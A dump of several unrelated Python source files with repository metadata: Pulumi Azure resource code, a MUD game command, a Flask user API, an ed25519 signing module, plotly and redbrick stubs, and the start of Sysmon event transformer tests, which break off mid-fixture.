warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['client_protocol'] = client_protocol
if cluster_name is None and not opts.urn:
raise TypeError("Missing required property 'cluster_name'")
__props__['cluster_name'] = cluster_name
__props__['clustering_policy'] = clustering_policy
__props__['database_name'] = database_name
__props__['eviction_policy'] = eviction_policy
__props__['modules'] = modules
__props__['persistence'] = persistence
__props__['port'] = port
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
__props__['name'] = None
__props__['provisioning_state'] = None
__props__['resource_state'] = None
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:cache/latest:Database"), pulumi.Alias(type_="azure-nextgen:cache/v20201001preview:Database"), pulumi.Alias(type_="azure-nextgen:cache/v20210301:Database")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(Database, __self__).__init__(
'azure-nextgen:cache:Database',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'Database':
"""
Get an existing Database resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return Database(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="clientProtocol")
def client_protocol(self) -> pulumi.Output[Optional[str]]:
"""
Specifies whether redis clients can connect using TLS-encrypted or plaintext redis protocols. Default is TLS-encrypted.
"""
return pulumi.get(self, "client_protocol")
@property
@pulumi.getter(name="clusteringPolicy")
def clustering_policy(self) -> pulumi.Output[Optional[str]]:
"""
Clustering policy - default is OSSCluster. Specified at create time.
"""
return pulumi.get(self, "clustering_policy")
@property
@pulumi.getter(name="evictionPolicy")
def eviction_policy(self) -> pulumi.Output[Optional[str]]:
"""
Redis eviction policy - default is VolatileLRU
"""
return pulumi.get(self, "eviction_policy")
@property
@pulumi.getter
def modules(self) -> pulumi.Output[Optional[Sequence['outputs.ModuleResponse']]]:
"""
Optional set of redis modules to enable in this database - modules can only be added at creation time.
"""
return pulumi.get(self, "modules")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the resource
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def persistence(self) -> pulumi.Output[Optional['outputs.PersistenceResponse']]:
"""
Persistence settings
"""
return pulumi.get(self, "persistence")
@property
@pulumi.getter
def port(self) -> pulumi.Output[Optional[int]]:
"""
TCP port of the database endpoint. Specified at create time. Defaults to an available port.
"""
return pulumi.get(self, "port")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
Current provisioning status of the database
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="resourceState")
def resource_state(self) -> pulumi.Output[str]:
"""
Current resource status of the database
"""
return pulumi.get(self, "resource_state")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
"""
return pulumi.get(self, "type")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 44.071795 | 243 | 0.65313 |
6adad3d4b8b7605909645e62e96eca273e684f11 | 2,501 | py | Python | src/primaires/perso/commandes/m/__init__.py | stormi/tsunami | bdc853229834b52b2ee8ed54a3161a1a3133d926 | [
"BSD-3-Clause"
] | null | null | null | src/primaires/perso/commandes/m/__init__.py | stormi/tsunami | bdc853229834b52b2ee8ed54a3161a1a3133d926 | [
"BSD-3-Clause"
] | null | null | null | src/primaires/perso/commandes/m/__init__.py | stormi/tsunami | bdc853229834b52b2ee8ed54a3161a1a3133d926 | [
"BSD-3-Clause"
] | null | null | null | # -*-coding:Utf-8 -*
# Copyright (c) 2015 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Package contenant la commande 'm'."""
from primaires.interpreteur.commande.commande import Commande
class CmdM(Commande):
"""Commande 'm'."""
def __init__(self):
"""Constructeur de la commande"""
Commande.__init__(self, "m", "m")
self.aide_courte = "affiche votre mana"
self.aide_longue = \
"Cette commande affiche tout simplement votre mana. " \
"Elle peut être utile si vous avez décidé de masquer " \
"votre prompt (en utilisant par exemple la commande " \
"%prompt% %prompt:défaut%|ent| cacher|ff|) mais " \
"souhaitez connaître votre mana actuelle. Voir " \
"les commandes %v% (pour consulter votre vitalité) et %d% " \
"(pour consulter votre endurance)."
def interpreter(self, personnage, dic_masques):
"""Interprétation de la commande."""
personnage << str(personnage.stats.mana)
| 45.472727 | 79 | 0.719712 |
fbd09c951759208d1f7907c238b803c1f32b5b1d | 3,796 | py | Python | app/api/users.py | TopKeingt/MHS-code | 3173f16ef2cc625f9979eb382aee84633131bc29 | [
"MIT"
] | null | null | null | app/api/users.py | TopKeingt/MHS-code | 3173f16ef2cc625f9979eb382aee84633131bc29 | [
"MIT"
] | null | null | null | app/api/users.py | TopKeingt/MHS-code | 3173f16ef2cc625f9979eb382aee84633131bc29 | [
"MIT"
] | null | null | null | from flask import jsonify, request, url_for
from app import db
from app.models import User
from app.api import bp
from app.api.auth import token_auth
from app.api.errors import bad_request
import gspread
from oauth2client.service_account import ServiceAccountCredentials
from datetime import datetime
@bp.route('/users/<int:id>', methods=['GET'])
@token_auth.login_required
def get_user(id):
return jsonify(User.query.get_or_404(id).to_dict())
@bp.route('/users', methods=['GET'])
def get_users():
page = request.args.get('page', 1, type=int)
per_page = min(request.args.get('per_page', 3, type=int), 100)
data = User.to_collection_dict(User.query, page, per_page, 'api.get_users')
if request.args.get('html'):
divs = []
for item in data['items']:
divs.append('''
<div class="col-md-3 col-sm-6 mb-md-0 mb-5 mr-5">
<div class="avatar mx-auto">
<img src="{image}" style="width:255px !important; height: 255px !important" alt="{alt}">
</div>
<h4 class="font-weight-bold dark-grey-text my-4">{name}</h4>
<h6 class="text-uppercase grey-text mb-3"><strong>{role}</strong></h6>
</div>
'''.format(image=url_for('content.send_image', image_url=item['_links']['image']), alt=item['first_name'], name=item['first_name'] + ' ' + item['last_name'], role=item['role']))
payload = {
"_links": {
"next": data['_links']['next'],
"prev": data['_links']['prev'],
"self": data['_links']['self']
},
"_meta": {
"page": data['_meta']['page'],
"per_page": data['_meta']['per_page'],
"total_items": data['_meta']['total_items'],
"total_pages": data['_meta']['total_pages']
},
'divs': divs
}
return jsonify(payload)
return jsonify(data)
@bp.route('/members', methods=['GET'])
def get_members():
scope = ['https://spreadsheets.google.com/feeds','https://www.googleapis.com/auth/drive']
creds = ServiceAccountCredentials.from_json_keyfile_name('client_secret.json', scope)
client = gspread.authorize(creds)
sheet = client.open("Computer Club Application (Responses)").worksheet("2019")
records = sheet.get_all_records()
for record in records:
record['Time Stamp'] = datetime.strptime(record['Time Stamp'], '%m/%d/%Y %X').isoformat() + 'Z'
return jsonify(records)
# @bp.route('/users', methods=['POST'])
# def create_user():
# data = request.get_json() or {}
# if 'first_name' not in data or 'last_name' not in data or 'email' not in data or 'password' not in data:
# return bad_request('must include email, password, first_name, last_name fields')
# if User.query.filter_by(email=data['email']).first():
# return bad_request('please use a different email')
# user = User()
# user.from_dict(data, new_user=True)
# db.session.add(user)
# db.session.commit()
# response = jsonify(user.to_dict())
# response.status_code = 201
# response.headers['Location'] = url_for('api.get_user', id=user.id)
# return response
# @bp.route('/users/<int:id>', methods=['PUT'])
# @token_auth.login_required
# def update_user(id):
# user = User.query.get_or_404(id)
# data = request.get_json() or {}
# if 'email' in data and data['email'] != user.email and \
# User.query.filter_by(email=data['email']).first():
# return bad_request('please use a different email address')
# user.from_dict(data, new_user=False)
# db.session.commit()
# return jsonify(user.to_dict())
| 41.26087 | 189 | 0.601159 |
838a572ac76a408a480d5ae9c29942808d7c1a4e | 15,297 | py | Python | securesystemslib/ed25519_keys.py | lukpueh/securesystemslib | 23fd8a23c8da38d337aaa6fff4d5110db5964e83 | [
"MIT"
] | null | null | null | securesystemslib/ed25519_keys.py | lukpueh/securesystemslib | 23fd8a23c8da38d337aaa6fff4d5110db5964e83 | [
"MIT"
] | 1 | 2019-09-03T10:15:08.000Z | 2019-10-01T11:04:52.000Z | securesystemslib/ed25519_keys.py | lukpueh/securesystemslib | 23fd8a23c8da38d337aaa6fff4d5110db5964e83 | [
"MIT"
] | null | null | null | """
<Program Name>
ed25519_keys.py
<Author>
Vladimir Diaz <vladimir.v.diaz@gmail.com>
<Started>
September 24, 2013.
<Copyright>
See LICENSE for licensing information.
<Purpose>
The goal of this module is to support ed25519 signatures. ed25519 is an
elliptic-curve public key signature scheme, its main strength being small
signatures (64 bytes) and small public keys (32 bytes).
http://ed25519.cr.yp.to/
'securesystemslib/ed25519_keys.py' calls 'ed25519.py', which is the pure Python
implementation of ed25519 optimized for a faster runtime. The Python
reference implementation is concise, but very slow (verifying signatures
takes ~9 seconds on an Intel core 2 duo @ 2.2 ghz x 2). The optimized
version can verify signatures in ~2 seconds.
http://ed25519.cr.yp.to/software.html
https://github.com/pyca/ed25519
Optionally, ed25519 cryptographic operations may be executed by PyNaCl, which
is a Python binding to the NaCl library and is faster than the pure python
implementation. Verifying signatures can take approximately 0.0009 seconds.
PyNaCl relies on the libsodium C library. PyNaCl is required for key and
signature generation. Verifying signatures may be done in pure Python.
https://github.com/pyca/pynacl
https://github.com/jedisct1/libsodium
http://nacl.cr.yp.to/
https://github.com/pyca/ed25519
The ed25519-related functions included here are generate(), create_signature()
and verify_signature(). The 'ed25519' and PyNaCl (i.e., 'nacl') modules used
by ed25519_keys.py perform the actual ed25519 computations and the functions
listed above can be viewed as an easy-to-use public interface.
"""
# Help with Python 3 compatibility, where the print statement is a function, an
# implicit relative import is invalid, and the '/' operator performs true
# division. Example: print 'hello world' raises a 'SyntaxError' exception.
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
# 'binascii' required for hexadecimal conversions. Signatures and
# public/private keys are hexlified.
import binascii
# TODO: The 'warnings' module needed to temporarily suppress user warnings
# raised by 'pynacl' (as of version 0.2.3). Warnings temporarily suppressed
# here to avoid confusing users with an unexpected error message that gives
# no indication of its source. These warnings are printed when using
# the repository tools, including for clients that request an update.
# http://docs.python.org/2/library/warnings.html#temporarily-suppressing-warnings
import warnings
# 'os' required to generate OS-specific randomness (os.urandom) suitable for
# cryptographic use.
# http://docs.python.org/2/library/os.html#miscellaneous-functions
import os
# Import the python implementation of the ed25519 algorithm provided by pyca,
# which is an optimized version of the one provided by ed25519's authors.
# Note: The pure Python version does not include protection against side-channel
# attacks. Verifying signatures can take approximately 2 seconds on an intel
# core 2 duo @ 2.2 ghz x 2). Optionally, the PyNaCl module may be used to
# speed up ed25519 cryptographic operations.
# http://ed25519.cr.yp.to/software.html
# https://github.com/pyca/ed25519
# https://github.com/pyca/pynacl
#
# Import the PyNaCl library, if available. It is recommended this library be
# used over the pure python implementation of ed25519, due to its speedier
# routines and side-channel protections available in the libsodium library.
#
# TODO: Version 0.2.3 of 'pynacl' prints: "UserWarning: reimporting '...' might
# overwrite older definitions." when importing 'nacl.signing'. Suppress user
# warnings temporarily (at least until this issue is fixed by PyNaCl).
#
# Note: A 'pragma: no cover' comment is intended for test 'coverage'. Lines
# or code blocks with this comment should not be flagged as uncovered.
# pynacl will always be install prior to running the unit tests.
with warnings.catch_warnings():
warnings.simplefilter('ignore')
try:
import nacl.signing
import nacl.encoding
# PyNaCl's 'cffi' dependency may raise an 'IOError' exception when importing
# 'nacl.signing'.
except (ImportError, IOError): # pragma: no cover
pass
# The optimized pure Python implementation of ed25519 provided by TUF. If
# PyNaCl cannot be imported and an attempt to use is made in this module, a
# 'securesystemslib.exceptions.UnsupportedLibraryError' exception is raised.
import securesystemslib._vendor.ed25519.ed25519
import securesystemslib.formats
import securesystemslib.exceptions
# Supported ed25519 signing schemes: 'ed25519'. The pure Python implementation
# (i.e., ed25519') and PyNaCl (i.e., 'nacl', libsodium + Python bindings)
# modules are currently supported in the creation of 'ed25519' signatures.
# Previously, a distinction was made between signatures made by the pure Python
# implementation and PyNaCl.
_SUPPORTED_ED25519_SIGNING_SCHEMES = ['ed25519']
def generate_public_and_private():
"""
<Purpose>
Generate a pair of ed25519 public and private keys with PyNaCl. The public
and private keys returned conform to
'securesystemslib.formats.ED25519PULIC_SCHEMA' and
'securesystemslib.formats.ED25519SEED_SCHEMA', respectively, and have the
form:
'\xa2F\x99\xe0\x86\x80%\xc8\xee\x11\xb95T\xd9\...'
An ed25519 seed key is a random 32-byte string. Public keys are also 32
bytes.
>>> public, private = generate_public_and_private()
>>> securesystemslib.formats.ED25519PUBLIC_SCHEMA.matches(public)
True
>>> securesystemslib.formats.ED25519SEED_SCHEMA.matches(private)
True
<Arguments>
None.
<Exceptions>
securesystemslib.exceptions.UnsupportedLibraryError, if the PyNaCl ('nacl')
module is unavailable.
NotImplementedError, if a randomness source is not found by 'os.urandom'.
<Side Effects>
The ed25519 keys are generated by first creating a random 32-byte seed
with os.urandom() and then calling PyNaCl's nacl.signing.SigningKey().
<Returns>
A (public, private) tuple that conform to
'securesystemslib.formats.ED25519PUBLIC_SCHEMA' and
'securesystemslib.formats.ED25519SEED_SCHEMA', respectively.
"""
# Generate ed25519's seed key by calling os.urandom(). The random bytes
# returned should be suitable for cryptographic use and is OS-specific.
# Raise 'NotImplementedError' if a randomness source is not found.
# ed25519 seed keys are fixed at 32 bytes (256-bit keys).
# http://blog.mozilla.org/warner/2011/11/29/ed25519-keys/
seed = os.urandom(32)
public = None
# Generate the public key. PyNaCl (i.e., 'nacl' module) performs the actual
# key generation.
try:
nacl_key = nacl.signing.SigningKey(seed)
public = nacl_key.verify_key.encode(encoder=nacl.encoding.RawEncoder())
except NameError: # pragma: no cover
message = 'The PyNaCl library and/or its dependencies unavailable.'
raise securesystemslib.exceptions.UnsupportedLibraryError(message)
return public, seed
def create_signature(public_key, private_key, data, scheme):
"""
<Purpose>
Return a (signature, scheme) tuple, where the signature scheme is 'ed25519'
and is always generated by PyNaCl (i.e., 'nacl'). The signature returned
conforms to 'securesystemslib.formats.ED25519SIGNATURE_SCHEMA', and has the
form:
'\xae\xd7\x9f\xaf\x95{bP\x9e\xa8YO Z\x86\x9d...'
A signature is a 64-byte string.
>>> public, private = generate_public_and_private()
>>> data = b'The quick brown fox jumps over the lazy dog'
>>> scheme = 'ed25519'
>>> signature, scheme = \
create_signature(public, private, data, scheme)
>>> securesystemslib.formats.ED25519SIGNATURE_SCHEMA.matches(signature)
True
>>> scheme == 'ed25519'
True
>>> signature, scheme = \
create_signature(public, private, data, scheme)
>>> securesystemslib.formats.ED25519SIGNATURE_SCHEMA.matches(signature)
True
>>> scheme == 'ed25519'
True
<Arguments>
public:
The ed25519 public key, which is a 32-byte string.
private:
The ed25519 private key, which is a 32-byte string.
data:
Data object used by create_signature() to generate the signature.
scheme:
The signature scheme used to generate the signature.
<Exceptions>
securesystemslib.exceptions.FormatError, if the arguments are improperly
formatted.
securesystemslib.exceptions.CryptoError, if a signature cannot be created.
<Side Effects>
nacl.signing.SigningKey.sign() called to generate the actual signature.
<Returns>
A signature dictionary conformat to
'securesystemslib.format.SIGNATURE_SCHEMA'. ed25519 signatures are 64
bytes, however, the hexlified signature is stored in the dictionary
returned.
"""
# Does 'public_key' have the correct format?
# This check will ensure 'public_key' conforms to
# 'securesystemslib.formats.ED25519PUBLIC_SCHEMA', which must have length 32
# bytes. Raise 'securesystemslib.exceptions.FormatError' if the check fails.
securesystemslib.formats.ED25519PUBLIC_SCHEMA.check_match(public_key)
# Is 'private_key' properly formatted?
securesystemslib.formats.ED25519SEED_SCHEMA.check_match(private_key)
# Is 'scheme' properly formatted?
securesystemslib.formats.ED25519_SIG_SCHEMA.check_match(scheme)
# Signing the 'data' object requires a seed and public key.
# nacl.signing.SigningKey.sign() generates the signature.
public = public_key
private = private_key
signature = None
# The private and public keys have been validated above by
# 'securesystemslib.formats' and should be 32-byte strings. This is a
# defensive check for a valid 'scheme', which should have already been
# validated in the check_match() above.
if scheme == 'ed25519': #pragma: no cover
try:
nacl_key = nacl.signing.SigningKey(private)
nacl_sig = nacl_key.sign(data)
signature = nacl_sig.signature
except NameError: # pragma: no cover
message = 'The PyNaCl library and/or its dependencies unavailable.'
raise securesystemslib.exceptions.UnsupportedLibraryError(message)
except (ValueError, TypeError, nacl.exceptions.CryptoError) as e:
message = 'An "ed25519" signature could not be created with PyNaCl.'
raise securesystemslib.exceptions.CryptoError(message + str(e))
else: #pragma: no cover
raise securesystemslib.exceptions.UnsupportedAlgorithmError('Unsupported'
' signature scheme is specified: ' + repr(scheme))
return signature, scheme
def verify_signature(public_key, scheme, signature, data, use_pynacl=False):
"""
<Purpose>
Determine whether the private key corresponding to 'public_key' produced
'signature'. verify_signature() will use the public key, the 'scheme' and
'sig', and 'data' arguments to complete the verification.
>>> public, private = generate_public_and_private()
>>> data = b'The quick brown fox jumps over the lazy dog'
>>> scheme = 'ed25519'
>>> signature, scheme = \
create_signature(public, private, data, scheme)
>>> verify_signature(public, scheme, signature, data, use_pynacl=False)
True
>>> verify_signature(public, scheme, signature, data, use_pynacl=True)
True
>>> bad_data = b'The sly brown fox jumps over the lazy dog'
>>> bad_signature, scheme = \
create_signature(public, private, bad_data, scheme)
>>> verify_signature(public, scheme, bad_signature, data, use_pynacl=False)
False
<Arguments>
public_key:
The public key is a 32-byte string.
scheme:
'ed25519' signature scheme used by either the pure python
implementation (i.e., ed25519.py) or PyNacl (i.e., 'nacl').
signature:
The signature is a 64-byte string.
data:
Data object used by securesystemslib.ed25519_keys.create_signature() to
generate 'signature'. 'data' is needed here to verify the signature.
use_pynacl:
True, if the ed25519 signature should be verified by PyNaCl. False,
if the signature should be verified with the pure Python implementation
of ed25519 (slower).
<Exceptions>
securesystemslib.exceptions.UnsupportedAlgorithmError. Raised if the
signature scheme 'scheme' is not one supported by
securesystemslib.ed25519_keys.create_signature().
securesystemslib.exceptions.FormatError. Raised if the arguments are
improperly formatted.
<Side Effects>
securesystemslib._vendor.ed25519.ed25519.checkvalid() called to do the
actual verification. nacl.signing.VerifyKey.verify() called if
'use_pynacl' is True.
<Returns>
Boolean. True if the signature is valid, False otherwise.
"""
# Does 'public_key' have the correct format?
# This check will ensure 'public_key' conforms to
# 'securesystemslib.formats.ED25519PUBLIC_SCHEMA', which must have length 32
# bytes. Raise 'securesystemslib.exceptions.FormatError' if the check fails.
securesystemslib.formats.ED25519PUBLIC_SCHEMA.check_match(public_key)
# Is 'scheme' properly formatted?
securesystemslib.formats.ED25519_SIG_SCHEMA.check_match(scheme)
# Is 'signature' properly formatted?
securesystemslib.formats.ED25519SIGNATURE_SCHEMA.check_match(signature)
# Is 'use_pynacl' properly formatted?
securesystemslib.formats.BOOLEAN_SCHEMA.check_match(use_pynacl)
# Verify 'signature'. Before returning the Boolean result, ensure 'ed25519'
# was used as the signature scheme. Raise
# 'securesystemslib.exceptions.UnsupportedLibraryError' if 'use_pynacl' is
# True but 'nacl' is unavailable.
public = public_key
valid_signature = False
# This is a defensive check for a valid 'scheme', which should have already
# been validated in the check_match() above.
if scheme in _SUPPORTED_ED25519_SIGNING_SCHEMES: #pragma: no cover
if use_pynacl:
try:
nacl_verify_key = nacl.signing.VerifyKey(public)
nacl_message = nacl_verify_key.verify(data, signature)
valid_signature = True
except NameError: # pragma: no cover
message = 'The PyNaCl library and/or its dependencies unavailable.'
raise securesystemslib.exceptions.UnsupportedLibraryError(message)
except nacl.exceptions.BadSignatureError:
pass
# Verify 'ed25519' signature with the pure Python implementation.
else:
try:
securesystemslib._vendor.ed25519.ed25519.checkvalid(signature,
data, public)
valid_signature = True
# The pure Python implementation raises 'Exception' if 'signature' is
# invalid.
except Exception as e:
pass
else: #pragma: no cover
message = 'Unsupported ed25519 signature scheme: ' + repr(scheme) + '.\n' + \
'Supported schemes: ' + repr(_SUPPORTED_ED25519_SIGNING_SCHEMES) + '.'
raise securesystemslib.exceptions.UnsupportedAlgorithmError(message)
return valid_signature
if __name__ == '__main__':
# The interactive sessions of the documentation strings can
# be tested by running 'ed25519_keys.py' as a standalone module.
# python -B ed25519_keys.py
import doctest
doctest.testmod()
| 37.309756 | 81 | 0.740668 |
384fba6c855efd44c90b92f3144bc8d0d8cd022e | 126 | py | Python | redbrick/cli/__init__.py | dereklukacs/redbrick-sdk | 4cf93444c1d808694c1601334f9e039e616dfd3d | [
"MIT"
] | 1 | 2020-11-26T04:25:15.000Z | 2020-11-26T04:25:15.000Z | redbrick/cli/__init__.py | redbrick-ai/redbrick-sdk | 4cf93444c1d808694c1601334f9e039e616dfd3d | [
"MIT"
] | 33 | 2021-02-04T17:51:53.000Z | 2022-03-17T07:28:36.000Z | redbrick/cli/__init__.py | dereklukacs/redbrick-sdk | 4cf93444c1d808694c1601334f9e039e616dfd3d | [
"MIT"
] | 1 | 2021-06-09T10:06:35.000Z | 2021-06-09T10:06:35.000Z | """CLI for RedBrick SDK."""
from redbrick.cli.project import CLIProject
from redbrick.cli.public import cli_parser, cli_main
| 25.2 | 52 | 0.793651 |
4555646559c205362ffcd96596f3d05ea673323f | 506 | py | Python | plotly/validators/carpet/baxis/_minorgridcolor.py | gnestor/plotly.py | a8ae062795ddbf9867b8578fe6d9e244948c15ff | [
"MIT"
] | 12 | 2020-04-18T18:10:22.000Z | 2021-12-06T10:11:15.000Z | plotly/validators/carpet/baxis/_minorgridcolor.py | Vesauza/plotly.py | e53e626d59495d440341751f60aeff73ff365c28 | [
"MIT"
] | 27 | 2020-04-28T21:23:12.000Z | 2021-06-25T15:36:38.000Z | plotly/validators/carpet/baxis/_minorgridcolor.py | Vesauza/plotly.py | e53e626d59495d440341751f60aeff73ff365c28 | [
"MIT"
] | 6 | 2020-04-18T23:07:08.000Z | 2021-11-18T07:53:06.000Z | import _plotly_utils.basevalidators
class MinorgridcolorValidator(_plotly_utils.basevalidators.ColorValidator):
def __init__(
self,
plotly_name='minorgridcolor',
parent_name='carpet.baxis',
**kwargs
):
super(MinorgridcolorValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop('edit_type', 'calc'),
role=kwargs.pop('role', 'style'),
**kwargs
)
| 26.631579 | 75 | 0.618577 |
59015888ca572743199b40c98765555c4c06248c | 11,855 | py | Python | tests/transformers/test_sysmon_transformer.py | limkokhian/beagle | 791e83db94e5a8ab1965b155bb79d32bb259d2b3 | [
"MIT"
] | 1,139 | 2019-03-24T09:09:05.000Z | 2022-03-27T14:54:38.000Z | tests/transformers/test_sysmon_transformer.py | limkokhian/beagle | 791e83db94e5a8ab1965b155bb79d32bb259d2b3 | [
"MIT"
] | 78 | 2019-03-24T16:56:06.000Z | 2022-02-27T21:31:38.000Z | tests/transformers/test_sysmon_transformer.py | limkokhian/beagle | 791e83db94e5a8ab1965b155bb79d32bb259d2b3 | [
"MIT"
] | 149 | 2019-03-24T16:44:45.000Z | 2022-03-11T12:20:51.000Z | import pytest
from beagle.nodes import File, Process, Domain, IPAddress, RegistryKey
from beagle.transformers.sysmon_transformer import SysmonTransformer
@pytest.fixture
def transformer() -> SysmonTransformer:
return SysmonTransformer(None)
def test_dns_event(transformer):
event = {
"Provider_Name": "Microsoft-Windows-Sysmon",
"Provider_Guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"Provider": None,
"EventID_Qualifiers": "",
"EventID": "22",
"Version": "5",
"Level": "4",
"Task": "22",
"Opcode": "0",
"Keywords": "0x8000000000000000",
"TimeCreated_SystemTime": "2019-08-03 14:31:49.660530",
"TimeCreated": None,
"EventRecordID": "295",
"Correlation_ActivityID": "",
"Correlation_RelatedActivityID": "",
"Correlation": None,
"Execution_ProcessID": "7176",
"Execution_ThreadID": "4604",
"Execution": None,
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "DESKTOP-3KI19E0",
"Security_UserID": "S-1-5-18",
"Security": None,
"EventData_RuleName": None,
"EventData_UtcTime": 1564857108,
"EventData_ProcessGuid": "{8eb9d026-9ad2-5d45-0000-0010b7760001}",
"EventData_ProcessId": "4776",
"EventData_QueryName": "share.microsoft.com",
"EventData_QueryStatus": "0",
"EventData_QueryResults": "type: 5 share.microsoft.com.edgekey.net;type: 5 e11095.dscd.akamaiedge.net;::ffff:23.32.80.227;",
"EventData_Image": "C:\\Windows\\System32\\AppHostRegistrationVerifier.exe",
}
nodes = transformer.transform(event)
assert len(nodes) == 3
proc: Process = nodes[0]
proc_file: File = nodes[1]
domain: Domain = nodes[2]
assert domain in proc.dns_query_for
assert domain.domain == "share.microsoft.com"
assert proc in proc_file.file_of
def test_process_creation(transformer):
event = {
"Provider_Name": "Microsoft-Windows-Sysmon",
"Provider_Guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"Provider": None,
"EventID_Qualifiers": "",
"EventID": "1",
"Version": "5",
"Level": "4",
"Task": "1",
"Opcode": "0",
"Keywords": "0x8000000000000000",
"TimeCreated_SystemTime": "2019-08-03 14:24:22.586109",
"TimeCreated": None,
"EventRecordID": "3",
"Correlation_ActivityID": "",
"Correlation_RelatedActivityID": "",
"Correlation": None,
"Execution_ProcessID": "7176",
"Execution_ThreadID": "4528",
"Execution": None,
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "DESKTOP-3KI19E0",
"Security_UserID": "S-1-5-18",
"Security": None,
"EventData_RuleName": None,
"EventData_UtcTime": 1564856662,
"EventData_ProcessGuid": "{8eb9d026-9916-5d45-0000-001020f6b700}",
"EventData_ProcessId": "7176",
"EventData_Image": "C:\\Windows\\Sysmon64.exe",
"EventData_FileVersion": "10.2",
"EventData_Description": "System activity monitor",
"EventData_Product": "Sysinternals Sysmon",
"EventData_Company": "Sysinternals - www.sysinternals.com",
"EventData_OriginalFileName": "?",
"EventData_CommandLine": "C:\\Windows\\Sysmon64.exe",
"EventData_CurrentDirectory": "C:\\Windows\\system32\\",
"EventData_User": "NT AUTHORITY\\SYSTEM",
"EventData_LogonGuid": "{8eb9d026-bb89-5ca7-0000-0020e7030000}",
"EventData_LogonId": "0x00000000000003e7",
"EventData_TerminalSessionId": "0",
"EventData_IntegrityLevel": "System",
"EventData_Hashes": "SHA1=751602F5D1F36C594196BEF744E32983F5291E49",
"EventData_ParentProcessGuid": "{8eb9d026-bb89-5ca7-0000-001014a20000}",
"EventData_ParentProcessId": "616",
"EventData_ParentImage": "C:\\Windows\\System32\\services.exe",
"EventData_ParentCommandLine": "C:\\Windows\\system32\\services.exe",
}
nodes = transformer.transform(event)
assert len(nodes) == 4
parent_proc: Process = nodes[0]
proc: Process = nodes[2]
assert parent_proc.launched[proc]
def test_network_connection_no_hostname(transformer):
event = {
"Provider_Name": "Microsoft-Windows-Sysmon",
"Provider_Guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"Provider": None,
"EventID_Qualifiers": "",
"EventID": "3",
"Version": "5",
"Level": "4",
"Task": "3",
"Opcode": "0",
"Keywords": "0x8000000000000000",
"TimeCreated_SystemTime": "2015-10-08 14:14:14.747887",
"TimeCreated": None,
"EventRecordID": "990",
"Correlation_ActivityID": "",
"Correlation_RelatedActivityID": "",
"Correlation": None,
"Execution_ProcessID": "4072",
"Execution_ThreadID": "4620",
"Execution": None,
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "DESKTOP-OALUEJ1",
"Security_UserID": "S-1-5-18",
"Security": None,
"EventData_UtcTime": 1444328053,
"EventData_ProcessGuid": "{90e22fd2-8107-5615-0000-001090bd0100}",
"EventData_ProcessId": "1704",
"EventData_Image": "C:\\Windows\\System32\\svchost.exe",
"EventData_User": "NT AUTHORITY\\SYSTEM",
